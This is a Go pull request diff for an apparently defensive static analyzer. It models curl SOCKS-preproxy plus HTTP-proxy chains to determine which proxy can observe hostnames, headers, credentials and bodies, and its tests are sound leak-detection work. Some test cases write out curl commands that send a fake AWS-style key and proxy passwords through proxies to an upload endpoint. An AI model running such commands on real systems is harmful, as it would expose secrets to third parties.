### PR TITLE
fix(actionfacts): model SOCKS-preproxy plus HTTP-proxy observer chains

### DIFF
--- a/internal/actionfacts/curl_http_proxy_chain.go
+++ b/internal/actionfacts/curl_http_proxy_chain.go
@@ -234,8 +234,11 @@ func staticCurlPreproxyDestinationHostnameComponents(
 		}
 		components = append(components, candidate)
 	}
-	if curlProxyResolvesTargetHostname(chain.PreproxyCanonical, chain.PreproxyValue) {
-		appendComponent(chain.MainProxy.Host)
+	if _, err := netip.ParseAddr(chain.MainProxy.Host); err != nil {
+		if chain.MainProxy.Scheme == "https" ||
+			curlProxyResolvesTargetHostname(chain.PreproxyCanonical, chain.PreproxyValue) {
+			appendComponent(chain.MainProxy.Host)
+		}
 	}
 	if !chain.DownstreamPlaintext {
 		return components
@@ -257,10 +260,12 @@ func staticCurlPreproxyDestinationHostnameComponents(
 		if !hostnameValid {
 			continue
 		}
-		if targetFact.Scheme == "http" && !curlOriginHostHeaderOverridden(
-			command, parsed, target.Group,
-		) {
-			appendComponent(hostname.Value)
+		if targetFact.Scheme == "http" {
+			// CONNECT still names the origin authority after a Host override.
+			if curlProxyTunnelEnabled(parsed, target.Group) ||
+				!curlOriginHostHeaderOverridden(command, parsed, target.Group) {
+				appendComponent(hostname.Value)
+			}
 		}
 		if targetFact.Scheme == "https" {
 			sni, sniValid := staticHTTPSDestinationSNIComponent(
@@ -269,6 +274,28 @@ func staticCurlPreproxyDestinationHostnameComponents(
 			if sniValid {
 				appendComponent(sni.Value)
 			}
+		}
+	}
+	return components
+}
+
+func appendUniqueTransmittedRequestComponents(
+	components []TransmittedRequestComponent,
+	candidates ...TransmittedRequestComponent,
+) []TransmittedRequestComponent {
+	for _, candidate := range candidates {
+		if candidate.Value == "" {
+			continue
+		}
+		duplicate := false
+		for _, existing := range components {
+			if existing == candidate {
+				duplicate = true
+				break
+			}
+		}
+		if !duplicate {
+			components = append(components, candidate)
 		}
 	}
 	return components
@@ -297,10 +324,6 @@ func staticCurlPreproxyPlaintextHTTPRequestComponents(
 			proxiedHTTP = append(proxiedHTTP, targetFact)
 		}
 	}
-	if len(proxiedHTTP) == 0 {
-		return nil
-	}
-	origin := StaticCurlTransmittedMetadata(command)
 	component := func(value string) TransmittedRequestComponent {
 		return TransmittedRequestComponent{
 			Value: value, Scheme: chain.Preproxy.Scheme,
@@ -309,39 +332,36 @@ func staticCurlPreproxyPlaintextHTTPRequestComponents(
 	}
 	var components []TransmittedRequestComponent
 	appendComponent := func(value string) {
-		if value == "" {
-			return
+		components = appendUniqueTransmittedRequestComponents(components, component(value))
+	}
+	if len(proxiedHTTP) > 0 {
+		origin := StaticCurlTransmittedMetadata(command)
+		for _, value := range origin.Headers {
+			appendComponent(value)
 		}
-		candidate := component(value)
-		for _, existing := range components {
-			if existing == candidate {
-				return
-			}
+		for _, value := range origin.HTTPOriginCredentials {
+			appendComponent(value)
 		}
-		components = append(components, candidate)
-	}
-	for _, value := range origin.Headers {
-		appendComponent(value)
-	}
-	for _, value := range origin.HTTPOriginCredentials {
-		appendComponent(value)
-	}
-	for _, value := range origin.HTTPBearerTokens {
-		appendComponent(value)
-	}
-	appendTargetBound := func(candidates []TransmittedRequestComponent) {
-		for _, candidate := range candidates {
-			for _, target := range proxiedHTTP {
-				if candidate.Scheme == target.Scheme &&
-					candidate.Host == target.Host && candidate.Port == target.Port {
-					appendComponent(candidate.Value)
-					break
+		for _, value := range origin.HTTPBearerTokens {
+			appendComponent(value)
+		}
+		appendTargetBound := func(candidates []TransmittedRequestComponent) {
+			for _, candidate := range candidates {
+				for _, target := range proxiedHTTP {
+					if candidate.Scheme == target.Scheme &&
+						candidate.Host == target.Host && candidate.Port == target.Port {
+						appendComponent(candidate.Value)
+						break
+					}
 				}
 			}
 		}
+		appendTargetBound(origin.HTTPRequestComponents)
+		appendTargetBound(origin.HTTPOriginCredentialComponents)
 	}
-	appendTargetBound(origin.HTTPRequestComponents)
-	appendTargetBound(origin.HTTPOriginCredentialComponents)
+	for _, candidate := range staticCurlHTTPProxyTransmittedMetadata(command).ProxyRequestComponents {
+		components = appendUniqueTransmittedRequestComponents(components, component(candidate.Value))
+	}
 	return components
 }
 

--- a/internal/actionfacts/curl_http_proxy_chain.go
+++ b/internal/actionfacts/curl_http_proxy_chain.go
@@ -1,0 +1,354 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"net/netip"
+)
+
+// curlHTTPProxyChainRoute is the exact two-hop --preproxy SOCKS plus
+// --proxy HTTP(S) route. Each peer is a distinct physical observer.
+type curlHTTPProxyChainRoute struct {
+	Preproxy            NetworkFact
+	MainProxy           NetworkFact
+	PreproxyCanonical   string
+	PreproxyValue       string
+	DownstreamPlaintext bool
+}
+
+func staticCurlHTTPProxyChainRoute(
+	command CommandFact,
+) (curlHTTPProxyChainRoute, curlArgvParse, bool) {
+	empty := func() (curlHTTPProxyChainRoute, curlArgvParse, bool) {
+		return curlHTTPProxyChainRoute{}, curlArgvParse{}, false
+	}
+	if command.Effect != EffectExecute || !command.ArgvComplete ||
+		command.ParentCommandID != 0 || len(command.Wrappers) != 0 ||
+		len(command.Redirects) != 0 || command.Program != "curl" ||
+		len(command.Argv) == 0 || !staticCurlArgvIdentity(command) ||
+		!staticCurlProgramIdentity(command) ||
+		len(command.Arguments) != len(command.Argv) {
+		return empty()
+	}
+	for index := range command.Argv {
+		if !staticCommandArgumentAt(command, index) {
+			return empty()
+		}
+	}
+	parsed := parseCurlArgv(command.Argv)
+	if !parsed.Complete || parsed.ConfigOpaque || parsed.Preview ||
+		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
+		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
+		!curlRangeOptionsValid(parsed) ||
+		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		return empty()
+	}
+	group := parsed.Targets[0].Group
+	if !staticCurlNetrcSetupValid(command, parsed, group) ||
+		!staticCurlGETPostDataValid(command, parsed, group) {
+		return empty()
+	}
+	if _, valid := staticCurlHTTPRequestComponentProjection(
+		command, parsed, group,
+	); !valid || !curlStaticFormSequenceValid(command, parsed, group) {
+		return empty()
+	}
+	lastProxy := -1
+	lastPreproxy := -1
+	lastNoProxy := -1
+	lastProxyUser := -1
+	fail := false
+	failWithBody := false
+	for index, option := range parsed.Options {
+		if option.Group != group || option.Canonical == "--next" ||
+			option.Role == curlOptionConfig {
+			return empty()
+		}
+		if !curlProxyOptionPreservesDestination(command, option) {
+			return empty()
+		}
+		if option.Role == curlOptionNetworkOverride {
+			switch {
+			case curlMainProxyOption(option.Canonical):
+				lastProxy = index
+			case option.Canonical == "--preproxy":
+				lastPreproxy = index
+			case option.Canonical == "--noproxy":
+				lastNoProxy = index
+			default:
+				return empty()
+			}
+		}
+		if option.Canonical == "--proxy-user" && option.ValuePresent {
+			lastProxyUser = index
+		}
+		if option.Canonical == "--fail" {
+			fail = option.Name != "--no-fail"
+		}
+		if option.Canonical == "--fail-with-body" {
+			failWithBody = option.Name != "--no-fail-with-body"
+		}
+	}
+	if lastProxy < 0 || lastPreproxy < 0 || fail && failWithBody {
+		return empty()
+	}
+	proxyOption := parsed.Options[lastProxy]
+	preproxyOption := parsed.Options[lastPreproxy]
+	if !staticCurlOptionValue(command, proxyOption) ||
+		!staticCurlOptionValue(command, preproxyOption) {
+		return empty()
+	}
+	if proxyOption.Value == "" ||
+		curlProxyDecodedControlUserinfoDisables(
+			command.ID, proxyOption.Canonical, proxyOption.Value,
+		) || curlProxyDecodedControlUserinfoDisables(
+		command.ID, "--proxy", preproxyOption.Value,
+	) {
+		return empty()
+	}
+	if lastNoProxy >= 0 &&
+		!staticCurlOptionValue(command, parsed.Options[lastNoProxy]) {
+		return empty()
+	}
+	if lastProxyUser >= 0 {
+		proxyUser := parsed.Options[lastProxyUser]
+		if !staticCurlOptionValue(command, proxyUser) {
+			return empty()
+		}
+		if _, _, valid := curlDecodedProxyCredentials(proxyUser.Value); !valid {
+			return empty()
+		}
+	}
+	if !curlExplicitSOCKSProxyURL(preproxyOption.Value) {
+		return empty()
+	}
+	mainProxy, _, _, mainOK := staticCurlHTTPProxyFact(
+		command.ID, proxyOption.Canonical, proxyOption.Value,
+	)
+	if !mainOK || mainProxy.Scheme != "http" && mainProxy.Scheme != "https" {
+		return empty()
+	}
+	preproxy, preproxySOCKS, preproxyOK := staticCurlFTPProxyFact(
+		command.ID, "--proxy", preproxyOption.Value,
+	)
+	if !preproxyOK || !preproxySOCKS || preproxy.Scheme != "tcp" {
+		return empty()
+	}
+	if !curlSOCKS4UserWithinBounds(
+		"--proxy", preproxyOption.Value, "", false,
+	) {
+		return empty()
+	}
+	if curlProxyUsesSOCKS4("--proxy", preproxyOption.Value) &&
+		!curlProxyUsesSOCKS4A("--proxy", preproxyOption.Value) {
+		address, err := netip.ParseAddr(mainProxy.Host)
+		if err != nil || address.Is6() {
+			return empty()
+		}
+	}
+	if !curlProxyPeerMatchesIPVersion(preproxy, parsed, group) ||
+		!curlProxyPeerMatchesIPVersion(mainProxy, parsed, group) {
+		return empty()
+	}
+	hasHTTPTarget := false
+	proxyContact := false
+	for _, target := range parsed.Targets {
+		if target.Group != group ||
+			!staticCommandArgumentAt(command, target.ArgvIndex) ||
+			!validLiteralRequestTarget(target.Value) ||
+			curlHasUnmodeledGlob(target.Value) ||
+			curlTargetHasInvalidUserinfo(target.Value) {
+			return empty()
+		}
+		targetFact, ok := webTargetFact(command.ID, target.Value, NetworkDownload)
+		if !ok || targetFact.Scheme != "http" && targetFact.Scheme != "https" {
+			return empty()
+		}
+		hasHTTPTarget = true
+		if curlTargetUsesExplicitProxy(parsed, target) {
+			proxyContact = true
+		}
+	}
+	if !hasHTTPTarget || !proxyContact {
+		return empty()
+	}
+	return curlHTTPProxyChainRoute{
+		Preproxy:            preproxy,
+		MainProxy:           mainProxy,
+		PreproxyCanonical:   "--proxy",
+		PreproxyValue:       preproxyOption.Value,
+		DownstreamPlaintext: mainProxy.Scheme == "http",
+	}, parsed, true
+}
+
+func staticCurlHTTPProxyChainDestination(
+	command CommandFact,
+) (NetworkFact, curlArgvParse, bool) {
+	chain, parsed, ok := staticCurlHTTPProxyChainRoute(command)
+	if !ok {
+		return NetworkFact{}, curlArgvParse{}, false
+	}
+	return chain.MainProxy, parsed, true
+}
+
+func staticCurlPreproxyDestinationHostnameComponents(
+	command CommandFact,
+) []TransmittedRequestComponent {
+	chain, parsed, ok := staticCurlHTTPProxyChainRoute(command)
+	if !ok || len(parsed.Targets) == 0 ||
+		!staticCurlHostnameFirstWireSetupValid(
+			command, parsed, parsed.Targets[0].Group,
+		) {
+		return nil
+	}
+	component := func(value string) TransmittedRequestComponent {
+		return TransmittedRequestComponent{
+			Value: value, Scheme: chain.Preproxy.Scheme,
+			Host: chain.Preproxy.Host, Port: chain.Preproxy.Port,
+		}
+	}
+	var components []TransmittedRequestComponent
+	appendComponent := func(value string) {
+		if value == "" {
+			return
+		}
+		candidate := component(value)
+		for _, existing := range components {
+			if existing == candidate {
+				return
+			}
+		}
+		components = append(components, candidate)
+	}
+	if curlProxyResolvesTargetHostname(chain.PreproxyCanonical, chain.PreproxyValue) {
+		appendComponent(chain.MainProxy.Host)
+	}
+	if !chain.DownstreamPlaintext {
+		return components
+	}
+	group := parsed.Targets[0].Group
+	for _, target := range parsed.Targets {
+		if target.Group != group || !curlTargetUsesExplicitProxy(parsed, target) {
+			continue
+		}
+		targetFact, valid := webTargetFact(
+			command.ID, target.Value, NetworkDownload,
+		)
+		if !valid || targetFact.Scheme != "http" && targetFact.Scheme != "https" {
+			continue
+		}
+		hostname, hostnameValid := staticHTTPDestinationHostnameComponent(
+			target.Value, targetFact,
+		)
+		if !hostnameValid {
+			continue
+		}
+		if targetFact.Scheme == "http" && !curlOriginHostHeaderOverridden(
+			command, parsed, target.Group,
+		) {
+			appendComponent(hostname.Value)
+		}
+		if targetFact.Scheme == "https" {
+			sni, sniValid := staticHTTPSDestinationSNIComponent(
+				target.Value, targetFact,
+			)
+			if sniValid {
+				appendComponent(sni.Value)
+			}
+		}
+	}
+	return components
+}
+
+func staticCurlPreproxyPlaintextHTTPRequestComponents(
+	command CommandFact,
+) []TransmittedRequestComponent {
+	chain, parsed, ok := staticCurlHTTPProxyChainRoute(command)
+	if !ok || !chain.DownstreamPlaintext || len(parsed.Targets) == 0 ||
+		!staticCurlHostnameFirstWireSetupValid(
+			command, parsed, parsed.Targets[0].Group,
+		) {
+		return nil
+	}
+	group := parsed.Targets[0].Group
+	var proxiedHTTP []NetworkFact
+	for _, target := range parsed.Targets {
+		if target.Group != group || !curlTargetUsesExplicitProxy(parsed, target) {
+			continue
+		}
+		targetFact, valid := webTargetFact(
+			command.ID, target.Value, NetworkDownload,
+		)
+		if valid && targetFact.Scheme == "http" {
+			proxiedHTTP = append(proxiedHTTP, targetFact)
+		}
+	}
+	if len(proxiedHTTP) == 0 {
+		return nil
+	}
+	origin := StaticCurlTransmittedMetadata(command)
+	component := func(value string) TransmittedRequestComponent {
+		return TransmittedRequestComponent{
+			Value: value, Scheme: chain.Preproxy.Scheme,
+			Host: chain.Preproxy.Host, Port: chain.Preproxy.Port,
+		}
+	}
+	var components []TransmittedRequestComponent
+	appendComponent := func(value string) {
+		if value == "" {
+			return
+		}
+		candidate := component(value)
+		for _, existing := range components {
+			if existing == candidate {
+				return
+			}
+		}
+		components = append(components, candidate)
+	}
+	for _, value := range origin.Headers {
+		appendComponent(value)
+	}
+	for _, value := range origin.HTTPOriginCredentials {
+		appendComponent(value)
+	}
+	for _, value := range origin.HTTPBearerTokens {
+		appendComponent(value)
+	}
+	appendTargetBound := func(candidates []TransmittedRequestComponent) {
+		for _, candidate := range candidates {
+			for _, target := range proxiedHTTP {
+				if candidate.Scheme == target.Scheme &&
+					candidate.Host == target.Host && candidate.Port == target.Port {
+					appendComponent(candidate.Value)
+					break
+				}
+			}
+		}
+	}
+	appendTargetBound(origin.HTTPRequestComponents)
+	appendTargetBound(origin.HTTPOriginCredentialComponents)
+	return components
+}
+
+func curlHTTPProxyChainNetworks(command CommandFact) []NetworkFact {
+	chain, _, ok := staticCurlHTTPProxyChainRoute(command)
+	if !ok {
+		return nil
+	}
+	return []NetworkFact{chain.Preproxy, chain.MainProxy}
+}

--- a/internal/actionfacts/curl_http_proxy_chain.go
+++ b/internal/actionfacts/curl_http_proxy_chain.go
@@ -244,6 +244,13 @@ func staticCurlPreproxyDestinationHostnameComponents(
 		return components
 	}
 	group := parsed.Targets[0].Group
+	requestProjection, requestValid := staticCurlHTTPRequestComponentProjection(
+		command, parsed, group,
+	)
+	if !requestValid {
+		return components
+	}
+	originHostOverridden := curlOriginHostHeaderOverridden(command, parsed, group)
 	for _, target := range parsed.Targets {
 		if target.Group != group || !curlTargetUsesExplicitProxy(parsed, target) {
 			continue
@@ -261,9 +268,11 @@ func staticCurlPreproxyDestinationHostnameComponents(
 			continue
 		}
 		if targetFact.Scheme == "http" {
-			// CONNECT still names the origin authority after a Host override.
+			// CONNECT names the origin authority after a Host override.
+			// Forward-proxy HTTP still sends the absolute-form origin
+			// hostname; only --request-target plus a Host override hides it.
 			if curlProxyTunnelEnabled(parsed, target.Group) ||
-				!curlOriginHostHeaderOverridden(command, parsed, target.Group) {
+				!(requestProjection.requestTargetSet && originHostOverridden) {
 				appendComponent(hostname.Value)
 			}
 		}

--- a/internal/actionfacts/curl_http_proxy_chain_test.go
+++ b/internal/actionfacts/curl_http_proxy_chain_test.go
@@ -1,0 +1,380 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"testing"
+)
+
+func TestStaticCurlHTTPProxyChainRoute(t *testing.T) {
+	t.Parallel()
+
+	for _, test := range []struct {
+		name              string
+		argv              []string
+		wantOK            bool
+		wantPreproxyHost  string
+		wantMainHost      string
+		wantMainScheme    string
+		wantPlaintext     bool
+		wantAuthoritative bool
+	}{
+		{
+			name: "SOCKS5h preproxy plus HTTP main proxy",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+			},
+			wantOK:            true,
+			wantPreproxyHost:  "preproxy.example",
+			wantMainHost:      "proxy.example",
+			wantMainScheme:    "http",
+			wantPlaintext:     true,
+			wantAuthoritative: true,
+		},
+		{
+			name: "SOCKS4a preproxy plus HTTPS main proxy",
+			argv: []string{
+				"curl", "--preproxy", "socks4a://preproxy.example",
+				"--proxy", "https://proxy.example", "https://origin.example/",
+			},
+			wantOK:            true,
+			wantPreproxyHost:  "preproxy.example",
+			wantMainHost:      "proxy.example",
+			wantMainScheme:    "https",
+			wantAuthoritative: true,
+		},
+		{
+			name: "locally resolving SOCKS5 plus HTTP main proxy",
+			argv: []string{
+				"curl", "--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+			},
+			wantOK:            true,
+			wantPreproxyHost:  "preproxy.example",
+			wantMainHost:      "proxy.example",
+			wantMainScheme:    "http",
+			wantPlaintext:     true,
+			wantAuthoritative: true,
+		},
+		{
+			name: "matching noproxy bypasses the chain",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "--noproxy", "origin.example",
+				"http://origin.example/",
+			},
+		},
+		{
+			name: "local preproxy remains a proved chain",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://127.0.0.1",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+			},
+			wantOK:            true,
+			wantPreproxyHost:  "127.0.0.1",
+			wantMainHost:      "proxy.example",
+			wantMainScheme:    "http",
+			wantPlaintext:     true,
+			wantAuthoritative: true,
+		},
+		{
+			name: "mixed later transfer group closes the chain",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+				"--next", "https://two.example/",
+			},
+		},
+		{
+			name: "config-derived route stays outside the exact lane",
+			argv: []string{
+				"curl", "--config", "curlrc", "--preproxy",
+				"socks5h://preproxy.example", "--proxy", "http://proxy.example",
+				"http://origin.example/",
+			},
+		},
+		{
+			name: "HTTP preproxy is not a SOCKS first hop",
+			argv: []string{
+				"curl", "--preproxy", "http://preproxy.example",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+			},
+		},
+		{
+			name: "SOCKS4 plus IPv4 main proxy",
+			argv: []string{
+				"curl", "--preproxy", "socks4://preproxy.example",
+				"--proxy", "http://192.0.2.10", "http://origin.example/",
+			},
+			wantOK:            true,
+			wantPreproxyHost:  "preproxy.example",
+			wantMainHost:      "192.0.2.10",
+			wantMainScheme:    "http",
+			wantPlaintext:     true,
+			wantAuthoritative: true,
+		},
+		{
+			name: "SOCKS4 plus IPv6 main proxy is not exact",
+			argv: []string{
+				"curl", "--preproxy", "socks4://preproxy.example",
+				"--proxy", "http://[2001:db8::10]", "http://origin.example/",
+			},
+		},
+		{
+			name: "header file is a pre-connect failure",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "--header", "@/missing",
+				"http://origin.example/",
+			},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{Tool: "exec", Argv: test.argv})
+			if facts.Authoritative() != test.wantAuthoritative {
+				t.Fatalf("Authoritative() = %t, want %t status=%s issues=%v",
+					facts.Authoritative(), test.wantAuthoritative,
+					facts.Parse.Status, facts.Parse.Issues)
+			}
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			chain, _, ok := staticCurlHTTPProxyChainRoute(facts.Commands[0])
+			if ok != test.wantOK {
+				t.Fatalf("chain ok = %t, want %t chain=%#v", ok, test.wantOK, chain)
+			}
+			if !test.wantOK {
+				return
+			}
+			if chain.Preproxy.Scheme != "tcp" ||
+				chain.Preproxy.Host != test.wantPreproxyHost ||
+				chain.MainProxy.Scheme != test.wantMainScheme ||
+				chain.MainProxy.Host != test.wantMainHost ||
+				chain.DownstreamPlaintext != test.wantPlaintext {
+				t.Fatalf("chain = %#v", chain)
+			}
+		})
+	}
+}
+
+func TestStaticCurlPreproxyObserverComponents(t *testing.T) {
+	t.Parallel()
+
+	const token = "AKIA7Q2M9X4B6C8D3F5H"
+	for _, test := range []struct {
+		name         string
+		argv         []string
+		wantHost     string
+		rejectHost   string
+		wantRequest  string
+		wantObserver string
+	}{
+		{
+			name: "SOCKS5h observes HTTP main-proxy hostname",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "http://origin.example/",
+			},
+			wantHost:     "proxy.example",
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "plaintext HTTP origin header is visible to SOCKS5h",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "--header",
+				"X-Key: " + token, "http://origin.example/",
+			},
+			wantHost:     "proxy.example",
+			wantRequest:  "X-Key: " + token,
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "HTTPS main proxy hides origin header from SOCKS",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "https://proxy.example", "--header",
+				"X-Key: " + token, "http://origin.example/",
+			},
+			wantHost:     "proxy.example",
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "Host override does not copy origin hostname onto SOCKS5",
+			argv: []string{
+				"curl", "--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://proxy.example", "--header",
+				"Host: other.example", "http://origin.example/",
+			},
+			rejectHost:   "origin.example",
+			wantRequest:  "Host: other.example",
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "HTTPS main proxy hides origin SNI from SOCKS",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://preproxy.example",
+				"--proxy", "https://proxy.example", "https://origin.example/",
+			},
+			wantHost:     "proxy.example",
+			rejectHost:   "origin.example",
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "HTTPS origin SNI is visible to SOCKS when main is HTTP",
+			argv: []string{
+				"curl", "--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://proxy.example", "https://origin.example/",
+			},
+			wantHost:     "origin.example",
+			wantObserver: "preproxy.example",
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{Tool: "exec", Argv: test.argv})
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			hosts := staticCurlPreproxyDestinationHostnameComponents(facts.Commands[0])
+			requests := staticCurlPreproxyPlaintextHTTPRequestComponents(facts.Commands[0])
+			if test.wantHost == "" && test.wantRequest == "" {
+				if len(hosts) != 0 || len(requests) != 0 {
+					t.Fatalf("hosts=%#v requests=%#v", hosts, requests)
+				}
+				return
+			}
+			if test.wantHost != "" {
+				found := false
+				for _, host := range hosts {
+					if host.Value == test.wantHost &&
+						host.Host == test.wantObserver && host.Scheme == "tcp" {
+						found = true
+						break
+					}
+				}
+				if !found {
+					t.Fatalf("hosts = %#v, want %q on %q", hosts, test.wantHost, test.wantObserver)
+				}
+			}
+			if test.wantRequest != "" {
+				found := false
+				for _, request := range requests {
+					if request.Value == test.wantRequest &&
+						request.Host == test.wantObserver && request.Scheme == "tcp" {
+						found = true
+						break
+					}
+				}
+				if !found {
+					t.Fatalf("requests = %#v, want %q on %q", requests, test.wantRequest, test.wantObserver)
+				}
+			}
+			if test.wantRequest == "" {
+				for _, request := range requests {
+					if request.Value == "X-Key: "+token {
+						t.Fatalf("origin header leaked onto SOCKS: %#v", requests)
+					}
+				}
+			}
+			if test.rejectHost != "" {
+				for _, host := range hosts {
+					if host.Value == test.rejectHost {
+						t.Fatalf("hostname %q leaked onto SOCKS: %#v", test.rejectHost, hosts)
+					}
+				}
+			}
+		})
+	}
+}
+
+func TestStaticCurlHTTPProxyChainNetworks(t *testing.T) {
+	t.Parallel()
+
+	facts := Analyze(Input{
+		Tool: "exec",
+		Argv: []string{
+			"curl", "--preproxy", "socks5h://preproxy.example",
+			"--proxy", "http://proxy.example", "http://origin.example/",
+		},
+	})
+	if !facts.Authoritative() || len(facts.Commands) != 1 {
+		t.Fatalf("facts = %#v", facts)
+	}
+	if !hasNetworkHost(facts, NetworkConnect, "preproxy.example") ||
+		!hasNetworkHost(facts, NetworkConnect, "proxy.example") ||
+		!hasNetworkHost(facts, NetworkDownload, "origin.example") {
+		t.Fatalf("chain networks = %#v", facts.Network)
+	}
+}
+
+func TestStaticCurlPreproxyObservesPlaintextHTTPBody(t *testing.T) {
+	t.Parallel()
+
+	const token = "AKIA7Q2M9X4B6C8D3F5H"
+	facts := Analyze(Input{
+		Tool: "exec",
+		Argv: []string{
+			"curl", "--preproxy", "socks5h://preproxy.example",
+			"--proxy", "http://proxy.example", "--data-raw", token,
+			"http://origin.example/upload",
+		},
+	})
+	if !facts.Authoritative() || len(facts.Commands) != 1 {
+		t.Fatalf("facts = %#v", facts)
+	}
+	foundSOCKS := false
+	foundMain := false
+	for _, component := range StaticCurlProxyUploadPayloads(facts.Commands[0]) {
+		if component.Value != token {
+			continue
+		}
+		if component.Host == "preproxy.example" && component.Scheme == "tcp" {
+			foundSOCKS = true
+		}
+		if component.Host == "proxy.example" && component.Scheme == "http" {
+			foundMain = true
+		}
+	}
+	if !foundSOCKS || !foundMain {
+		t.Fatalf("plaintext body observers = %#v",
+			StaticCurlProxyUploadPayloads(facts.Commands[0]))
+	}
+
+	encrypted := Analyze(Input{
+		Tool: "exec",
+		Argv: []string{
+			"curl", "--preproxy", "socks5h://preproxy.example",
+			"--proxy", "https://proxy.example", "--data-raw", token,
+			"http://origin.example/upload",
+		},
+	})
+	if !encrypted.Authoritative() || len(encrypted.Commands) != 1 {
+		t.Fatalf("encrypted facts = %#v", encrypted)
+	}
+	foundMain = false
+	for _, component := range StaticCurlProxyUploadPayloads(encrypted.Commands[0]) {
+		if component.Value != token {
+			continue
+		}
+		if component.Host == "preproxy.example" && component.Scheme == "tcp" {
+			t.Fatalf("origin body leaked onto SOCKS through HTTPS main: %#v",
+				component)
+		}
+		if component.Host == "proxy.example" && component.Scheme == "https" {
+			foundMain = true
+		}
+	}
+	if !foundMain {
+		t.Fatalf("HTTPS main missing body: %#v",
+			StaticCurlProxyUploadPayloads(encrypted.Commands[0]))
+	}
+}

--- a/internal/actionfacts/curl_http_proxy_chain_test.go
+++ b/internal/actionfacts/curl_http_proxy_chain_test.go
@@ -236,6 +236,37 @@ func TestStaticCurlPreproxyObserverComponents(t *testing.T) {
 			wantHost:     "origin.example",
 			wantObserver: "preproxy.example",
 		},
+		{
+			name: "proxytunnel CONNECT keeps origin hostname despite Host override",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://ext.example",
+				"--proxy", "http://127.0.0.1", "--proxytunnel",
+				"--header", "Host: decoy.example",
+				"http://secret-token.example/",
+			},
+			wantHost:     "secret-token.example",
+			wantObserver: "ext.example",
+		},
+		{
+			name: "locally resolving SOCKS5 observes HTTPS main-proxy SNI",
+			argv: []string{
+				"curl", "--preproxy", "socks5://ext.example",
+				"--proxy", "https://proxy.example", "http://origin.example/",
+			},
+			wantHost:     "proxy.example",
+			rejectHost:   "origin.example",
+			wantObserver: "ext.example",
+		},
+		{
+			name: "remote SOCKS5h does not expose numeric HTTP main-proxy host",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://ext.example",
+				"--proxy", "http://192.0.2.10", "http://origin.example/",
+			},
+			wantHost:     "origin.example",
+			rejectHost:   "192.0.2.10",
+			wantObserver: "ext.example",
+		},
 	} {
 		test := test
 		t.Run(test.name, func(t *testing.T) {
@@ -290,6 +321,95 @@ func TestStaticCurlPreproxyObserverComponents(t *testing.T) {
 					if host.Value == test.rejectHost {
 						t.Fatalf("hostname %q leaked onto SOCKS: %#v", test.rejectHost, hosts)
 					}
+				}
+			}
+		})
+	}
+}
+
+func TestStaticCurlPreproxyProjectsPlaintextHTTPProxyRequest(t *testing.T) {
+	t.Parallel()
+
+	for _, test := range []struct {
+		name         string
+		argv         []string
+		wantValues   []string
+		rejectValues []string
+		observer     string
+	}{
+		{
+			name: "plaintext HTTP main-proxy credentials reach the preproxy",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://ext.example",
+				"--proxy", "http://user:pass@proxy.example",
+				"--proxy-user", "other:secret",
+				"--proxy-header", "X-Proxy: tok",
+				"http://origin.example/",
+			},
+			wantValues: []string{"user:pass", "X-Proxy: tok"},
+			observer:   "ext.example",
+		},
+		{
+			name: "plaintext HTTP --proxy-user reaches the preproxy",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://ext.example",
+				"--proxy", "http://proxy.example",
+				"--proxy-user", "other:secret",
+				"--proxy-header", "X-Proxy: tok",
+				"http://origin.example/",
+			},
+			wantValues: []string{"other:secret", "X-Proxy: tok"},
+			observer:   "ext.example",
+		},
+		{
+			name: "HTTPS main proxy hides proxy request components from SOCKS",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://ext.example",
+				"--proxy", "https://user:pass@proxy.example",
+				"--proxy-user", "other:secret",
